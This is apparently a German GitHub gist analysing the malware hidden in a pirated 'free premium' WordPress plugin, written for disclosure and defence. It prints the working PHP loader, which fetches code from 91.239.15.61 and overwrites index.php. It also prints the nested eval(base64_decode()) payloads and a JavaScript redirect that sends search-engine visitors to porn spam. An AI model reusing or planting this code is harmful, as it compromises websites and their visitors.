-
-
Save ocean90/2e5df9a9430a9a45f0f0 to your computer and use it in GitHub Desktop.
Analyse des Skriptes zu einem angeblich kostenlosen Premiumplugin. http://blog.wpde.org/?p=2322
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
// Aus aioseop_class.php | |
// $X | |
/* ------------------------------------------------------------------ | |
Author: Abdul Rahman Sherzad (www.afghancybersoft.com) | |
Email: info@afghancybersoft.com | |
Biography: Abdul Rahman Sherzad was born and brought up in Herat-Afghanistan and completed my under-graduate studies | |
in Computer Science Faculty of Herat University in 2006 obtaining my B.C.S degree as the best outgoing senior student | |
from this faculty. Having intellectuality in Computer Programming and Information Database Management System, I was offered | |
to commence teaching in Computer Science Faculty of Herat University. After a while I joined CRS to work as the Database | |
Manager for the ADA program. I worked for CRS for a couple of years after which I was awarded a scholarship by the | |
government of Germany to pursue my Master in Information Database Management and Software Engineering in Berlin at | |
TU-Berlin University. I am currently also teaching at the Herat University as well as acting as the head of Information | |
Systems Manager both in CRS and Herat University to support the educational needs. | |
--------------------------------------------------------------------- */ | |
// Erste Zeile | |
$curl = curl_init('http://91.239.15.61/info.php'); | |
curl_setopt($curl, CURLOPT_FAILONERROR, true); | |
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); | |
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); | |
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); | |
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); | |
$result = curl_exec($curl); | |
// Zweite Zeile | |
$code_txt = 'http://91.239.15.61/o1.txt'; | |
$path = getenv("DOCUMENT_ROOT").''; | |
if(is_dir($path.'/wp-content') AND is_dir($path.'/wp-admin') AND is_dir($path.'/wp-includes')){ | |
$code= file_get_contents($code_txt); | |
$index_path = $path.'/index.php'; | |
if(file_put_contents($index_path, $code)){ | |
} | |
}else{ | |
echo 'Not a wordpress Installation'; | |
} | |
// http://91.239.15.61/o1.txt | |
/** | |
* Fehlende Anführungszeichen. | |
* Ansonten mehrfach eval(base64_decode(....)): | |
* | |
* string(1279) "eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtGcFlXbWhpUTJocFdWaE9iRTVxVW1aYVIxWnFZakpTYkV0RmVEVlBSR2hSVFRCS2Rsa3dSWGRUTUU1WVlrY3hURkl4YjNoWmJURlBUVWRHV0U5WVZsbE5iRmt3V1Zab1QwMUhUalZhTWpWYVRURmFOVmxyV1RWalIwcDBZa1JDUzJWWGRIZFNSa1oyVTIxV00wMUZkRVJWVjNSeVdrWm9TMk13YkVWTlIyUktZbGRuZDFwRmFFSk9hM2cxVDBSV1RsVjZValZVV0hCeVpGVXhWVlpZVms5aGExWXlXVmN4UjAxc2JGUlBWelZwVFdwc2RWbHJaRlprVjA1SVlVaGtTbUZ1VG01U1JrWjJVMnRPVkZWdGNHaFJNRVUxVTFWa1QwMVhUblJsUjFwb1ZucFdkMXBGVG01alJUazFVVmRrUlZWWE9VdFJNVTVUVFVkR1dFMVhlR2xOTVZsM1UxVlJkMW93TlZWak1tUktVVlJDVEZFeFJuTmhiVkpaVTI1T1dVMHdOWE5hUldNMVpESlNSRm95ZEZwTmJXUjZWVlJHVjFVeFVrWlBWa1pYVW1wc1YxWlhkRE5qTUhCSlZtNXNhVkV5Y3pOVFZVVjNVekJPVW1KSGNHdFhSWEI2VjBST1QySkhVa2hQV0dSclVUSmtjbGRVU201ak1VVjRWbXhPVlZKVWJGSldhMWsxVlRGS1YxVnNXbFpoZWxaV1ZsZDBSMVF4VlhkWGExcFdZVmhrTkZNeFVucGFNRkpTWWpCd1JGWXdOSGhaTWpFMFdtMU5lVlpxUW1sTk1FbDNVekJPVTJGdFJrUmxSVkpYVm10d1RsWkVSa05X.Vm1kM1ZHeENWV0Y2VmtkVlZFWlRWbFpPVmsxVldsVk5WbHBXVkVWT1UwMUhSbGhOVjNocFRURlpkMU14VW5wYU1GSlNZakJ3UkZVeFNuSlhWbWhUWVVWc1JVMUhaRnBOTVZvMVdXdFpOV0pIVmtoV2JYQk1VVEZLY1ZsVlRuSk9NR3hFVVZVMVJGb3lkRXRYVkU1WFpWZEtSMDlYY0dsU2VtdzJWMnhPYm1FeGEzbGFNMEpRWlZWR1QxRXlaSEpUYkhCWVZHMDVhV1ZWUm5CVGEyUlRZVWRTU0ZKWGJGQmtla0pNVVRGbmQxUnJUbkJQU0ZwUi5aV3BTVDFFeVkzQkxWSE1wS1RzKSk7));" | |
* string(942) "eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtFeDVPRGhRTTBKdlkwRXdTME5YYkcxTFIxb3hZbTFPTUdGWE9YVllNbFkwWVZoT01HTjVaMjVaTTFaNVlrWTVjR0p0YkRCS2VXdHdSRkZ2U21WM01FdERVV3RyWkZoS2MwbEVNR2RKYldnd1pFaEJOa3g1T0RWTlV6UjVUWHByZFUxVVZYVk9ha1YyWVcxR01sbFRPVzVpTWpsdVlrZFZkV05IYUhkSmFuTm5SRkZ2U2tOVFVtcGhRMEU1U1VkT01XTnRlR1poVnpWd1pFTm5jRTk1UVdkRVVXOUtRMU5TTUdGWE1XeGlNMVl3U1VRd1owNVVjMmRKUVRCTFExRnNhbVJZU25OWU0wNXNaRWM1ZDJSRFoydFpNbWR6VVRGV1UxUkZPVkZXUmpsV1ZXdDNjMHBJVm5saVEyczNTVUV3UzBOUmJHcGtXRXB6V0ROT2JHUkhPWGRrUTJkcldUSm5jMUV4VmxOVVJUbFJWa1k1VTFKV1VsWlZhelZWVld0R1QxVXdXa1pWYVhkNFMxUnpaMFJSYjBwRFYwNHhZMjE0Wm1NeVZqQmlNMEl3UzBOU2FtRkRlRVJXVmtwTlZERkNWVmd3VGxCVWF6VkdVVEZTVlZOVk1VWlVNVlpWVEVOU01HRlhNV3hpTTFZd1MxUnpaMFJSYjBwRFUxSnJXVmhTYUVsRU1HZFpNMVo1WWtZNWJHVkhWbXBMUTFKcVlVTnJOMGxEUVU1RFoydEtXVE5XZVdKR09XcGlSemw2V2xObmExa3laM0JQZVVGT1EyZHJTbHBYVG05aWVVRnBTa2RTYUdSSFJXbFBkekJMUTFnd1RrTnBPSFpR.ZWpST1EyY3BLVHMpKTs));" | |
* string(689) "eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKEx5ODhQM0JvY0EwS0NXbG1LR1oxYm1OMGFXOXVYMlY0YVhOMGN5Z25ZM1Z5YkY5cGJtbDBKeWtwRFFvSmV3MEtDUWtrZFhKc0lEMGdJbWgwZEhBNkx5ODVNUzR5TXprdU1UVXVOakV2YW1GMllTOW5iMjluYkdVdWNHaHdJanNnRFFvSkNTUmphQ0E5SUdOMWNteGZhVzVwZENncE95QWdEUW9KQ1NSMGFXMWxiM1YwSUQwZ05Uc2dJQTBLQ1FsamRYSnNYM05sZEc5d2RDZ2tZMmdzUTFWU1RFOVFWRjlWVWt3c0pIVnliQ2s3SUEwS0NRbGpkWEpzWDNObGRHOXdkQ2drWTJnc1ExVlNURTlRVkY5U1JWUlZVazVVVWtGT1UwWkZVaXd4S1RzZ0RRb0pDV04xY214ZmMyVjBiM0IwS0NSamFDeERWVkpNVDFCVVgwTlBUazVGUTFSVVNVMUZUMVZVTENSMGFXMWxiM1YwS1RzZ0RRb0pDU1JrWVhSaElEMGdZM1Z5YkY5bGVHVmpLQ1JqYUNrN0lDQU5DZ2tKWTNWeWJGOWpiRzl6WlNna1kyZ3BPeUFOQ2drSlpXTm9ieUFpSkdSaGRHRWlPdzBLQ1gwTkNpOHZQejROQ2cpKTs));" | |
* string(500) "eval(base64_decode(Ly88P3BocA0KCWlmKGZ1bmN0aW9uX2V4aXN0cygnY3VybF9pbml0JykpDQoJew0KCQkkdXJsID0gImh0dHA6Ly85MS4yMzkuMTUuNjEvamF2YS9nb29nbGUucGhwIjsgDQoJCSRjaCA9IGN1cmxfaW5pdCgpOyAgDQoJCSR0aW1lb3V0ID0gNTsgIA0KCQljdXJsX3NldG9wdCgkY2gsQ1VSTE9QVF9VUkwsJHVybCk7IA0KCQljdXJsX3NldG9wdCgkY2gsQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwxKTsgDQoJCWN1cmxfc2V0b3B0KCRjaCxDVVJMT1BUX0NPTk5FQ1RUSU1FT1VULCR0aW1lb3V0KTsgDQoJCSRkYXRhID0gY3VybF9leGVjKCRjaCk7ICANCgkJY3VybF9jbG9zZSgkY2gpOyANCgkJZWNobyAiJGRhdGEiOw0KCX0NCi8vPz4NCg));" | |
* => | |
*/ | |
//<?php | |
if(function_exists('curl_init')) | |
{ | |
$url = "http://91.239.15.61/java/google.php"; | |
$ch = curl_init(); | |
$timeout = 5; | |
curl_setopt($ch,CURLOPT_URL,$url); | |
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); | |
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); | |
$data = curl_exec($ch); | |
curl_close($ch); | |
echo "$data"; | |
} | |
//?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php ob_start(); ?> | |
<? eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtGcFlXbWhpUTJocFdWaE9iRTVxVW1aYVIxWnFZakpTYkV0R2NGbFhiV2hwVVRKb2NGZFdhRTlpUlRWeFZXMWFZVkl4V25GWmFrcFRZa1YwUm1WRVZsQlNSMmhTVkZSQ1MyUnNhM2RTV0dSVVRVVTFXVmxyWTNoVVJrbDRZak5vV21KVVJsQlVWV1JIVjBVNVdWWnNiRTVpUm10M1YxWmFiMVF3TVVoVWFsWmhUV3BXWVZSVVJtRk9WbXh5VjFSV2FsSXdjREJaYTFKRFV6SldXR1JJWkZOU2Exb3lWVEl4VjAwd01VWmtSVkpXVmpOU2VWZHJXbTlUTWsxM1lrVldUbEl5VWt0WmJHUnVaREZ3Um1GRlNrOWhNMmN4VkRCU1YxUnNWalpWYWxaVlYwaENlVnBHVlhoV1ZscFpWbXM1YUdFeFdYbFhWbU40VWpBeGMySkdVbEJXZWxad1ZGZHdjMlJXYkhKYVJscHJWakExU1ZsVmFHdFRiVVoxVkcwMVUxSnJXakpWTW5SUFZrWldkR05IYUZKTlJWVXhWVEZXYTFRd01WaFVibEpzVWpGd2IxWnVjRmRrTVhCR1ZHMDFhbEpVYXpGVlZtUnJVbFpXV0U5VmRGSk5WVFZVVkZWa1IxZEZNVmhsUjJ4T1RWWnNNMVV4VmxKa01XOTNUbFpXYWsxdFVrdFZWbEpEVkVaRmVGSnVUbWhpVmtwYVZUSTFUMWRWTUhkT1dFNWhVbGROTVZwRVNsTlNSbTk1WkVad1RtSlhValpXVmxKSFZqRlZlRlZyV2xCV2ExcFlWVzF3YzFZeFdsaGtSRTVxVFVoQ1NsWnROWE5o.VmtWNVkzcE9WRlpWVmpOVmVrSlBWVzFLU0dOSGRGaFNXRUkyVmpCU1QxUXlTa2hWYTJoUVYwZFNjbFZVU210amJHUlZVMjAxYWsxVlZqUldiWGhQVmxaS1ZXSkdTbGRoTVdzeFZsUkdTMVl4Vm5OWGJGcG9aV3hhVjFac1pEQlNNVkY0Vmxoa1dHRXhjRmRaVm1oclRrWk5lRlZ1Y0dGTlJrcFRXV3BDZDFKR1dYZE9TR2hhVFdwRk1GZHRNVTVsVmxweFVXMXNUazFGYkROVmVrSlBWVEpHZEZKclVteFNWa3BZVm0xMGQxUnNXa1ZTYTA1WC5WbTFrTTFaSGVFTldWMFkyVm10a1ZsWkZXbFJXYkZwUFZtc3hWbGRzVms1V2JIQlhWa1ZXVDFVd01VaFNiR2hPVmpOb2NGUlVSbHBrTVUxNFZXNXdZVTFHU2xOWmFrSjNVa1pWZUZOdVNsaFdiV2hVV1ZWV2MxSlZNVWhhUm5CT1RWWnZNVmRYZEZwT1YwcElWbXRvVjJKWVFrMVZWRVpMWTFac1ZsUnVTazlOUjNoRlZWWlZNVkpHYjNsa1JYUllWa1UxV0ZwV1pFdFNNRGxZWTBkc1UyVnRkekpXTW5oUFltMUZlR0V6YkdGTk1FcFJXbFpXUjFReFJYbGFTRXBVWWtoQ1dWWkhNRFZoVjFaV1VtNUNWR0V5VWxSWlZXUlRVMFpLV0dKR1FtdGxhMHBOVlZSR2JtUXhVbkpVYmtKUVUwWndVaTVhVjNCVFZERkZlVmt6UWt4V1NFMXdTMVJ6S1NrNykpOw)); ?> | |
<?php | |
/** | |
* Front to the WordPress application. This file doesn't do anything, but loads | |
* wp-blog-header.php which does and tells WordPress to load the theme. | |
* | |
* @package WordPress | |
*/ | |
/** | |
* Tells WordPress to load the WordPress theme and output it. | |
* | |
* @var bool | |
*/ | |
define('WP_USE_THEMES', true); | |
/** Loads the WordPress Environment and Template */ | |
require('./wp-blog-header.php'); |
Und das in der google.js
var from = document.referrer;
var i;
var se = ["google", "yahoo", "bing", "yandex" , "baidu", "gigablast", "soso", "blekko", "exalead", "sogou", "duckduckgo", "volunia"];
for (i = 0; i < se.length; ++i) {
if (from.indexOf(se[i]) + 1) {
if (!checkCookie()) {
window.location = "http://91.239.15.61/g.php";
}
}
}
function getCookie(c_name) {
var c_value = document.cookie;
var c_start = c_value.indexOf(" " + c_name + "=");
if (c_start == -1) {
c_start = c_value.indexOf(c_name + "=");
}
if (c_start == -1) {
c_value = null;
}
else {
c_start = c_value.indexOf("=", c_start) + 1;
var c_end = c_value.indexOf(";", c_start);
if (c_end == -1) {
c_end = c_value.length;
}
c_value = unescape(c_value.substring(c_start, c_end));
}
return c_value;
}
function setCookie(c_name, value, exdays) {
var exdate = new Date();
exdate.setDate(exdate.getDate() + exdays);
var c_value = escape(value) + ((exdays == null) ? "" : "; expires=" + exdate.toUTCString());
document.cookie = c_name + "=" + c_value;
}
function checkCookie() {
var referrerRedirectCookie = getCookie("referrerRedirectCookie");
if (referrerRedirectCookie != null && referrerRedirectCookie != "") {
return true;
}
else {
setCookie("referrerRedirectCookie", "do not redirect", 730);
return false;
}
}
Die http://91.239.15.61/g.php sollte nicht aufgerufen werden. Das ist Porn-Spam.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Das steht in der google.php: